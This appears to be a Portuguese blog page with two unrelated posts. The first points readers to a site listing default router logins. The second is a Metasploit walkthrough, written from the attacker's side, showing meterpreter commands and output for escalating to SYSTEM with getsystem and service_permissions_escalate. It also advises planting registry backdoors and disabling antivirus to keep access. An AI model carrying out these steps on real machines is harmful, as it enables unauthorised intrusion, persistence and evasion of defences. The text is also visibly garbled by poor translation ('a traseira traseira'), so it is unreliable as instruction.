Senhas padrões de roteadores

Às vezes, precisamos configurar um roteador e não sei o acesso de IP ou a senha do usuário para acessar a configuração.

 

RouterIPAddress É um site que recolhe acesso IP, nome de usuário e senha padrão para todas as marcas de roteadores do mundo.

O que temos que fazer é inserir a marca ou o modelo do roteador na busca eo sistema irá mostrar os resultados, entre os quais encontramos a foto padrão para que possamos identificar melhor e ter certeza que é o nosso. Também aqui vemos o acesso IP, usuário e senha por padrão.

Com esses dados podemos acessar a configuração do roteador, obviamente, se ele foi alterado para trazer a fábrica, caso contrário, apenas tem que repor.

Este site é muito útil, mas por outro lado é sempre recomendável alterar a senha que vem de fábrica, especialmente  o seu roteador wi-fi.

Fonte: Carluys

Escalação de Privilegios com MetaSploit FrameWork

Uma vez que um atacante conseguiu engajar um alvo, provavelmente, as primeiras atividades a serem realizadas serão escalar privilégios para executar tarefas de gerenciamento no alvo, cobrir seus rastros e, finalmente, garantir que o acesso à máquina comprometida não seja interrompida, o que significa que, na medida do possível, deve evitar a detecção por sistemas AV, firewalls, IDS, etc.

Uma vez obtida uma consola meterpreter através de algum payload (tal como reverse_tcp) pode ser utilizado a extensão priv:

meterpreter> use priv
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ’0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

Como você pode ver, existem diferentes técnicas utilizadas pela extensão priv para elevar os privilégios do console atual, você pode usar uma ou todas as técnicas, se nenhuma parametro é especificado, é utilizado todos os parametros:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Depois de obter um console Meterpreter com privilégios apropriados pode executar algumas operações adicionais para acesso mais seguro a máquinas remotas comprometidos, mas é necessário para obter privilégios … comando anteriormente getSystem meterpreter foi utilizada e foi usado para incógnito “personificar “sessões de usuário, mas às vezes não é possível obter um console de” janelas de matérias “com privilégios de sistema adequado nestes casos tem o script service_permissions_escalate

meterpreter > run service_permissions_escalate

Este script irá abrir tantas sessões quanto possível metepreter através da pesquisa e coleta de licenças de acordo com os programas instalados no computador de destino, o comando, uma vez terminado, você pode fechar o console meterpreter que está aberto e abrir uma nova (tanto que criou o roteiro) e tente executar o comando:

meterpreter > execute -f cmd -i

Desta forma, você pode obter um console “raw” com permissões de sistema para realizar vários tipos de tarefas (como a definição de backdoors através de registro ou sistema AV off).

Depois de abrir este console você pode listar os processos em execução da máquina de destino com o comando tasklist e pode terminar qualquer um deles com o comando taskkill. Embora você possa ver os processos e até mesmo matar alguns deles, em alguns casos, pode haver processos são resistentes ou persistente a excluir prisão por mecanismos convencionais, como no caso de um antivírus potente que detecta malware e outras vulnerabilidades e ameaças podem colocar em risco o sistema, de modo que, nesses casos, é altamente recomendável, tente desativar o antivírus da sessão aberta para garantir que ele não vai destruir a traseira traseira estabelecida.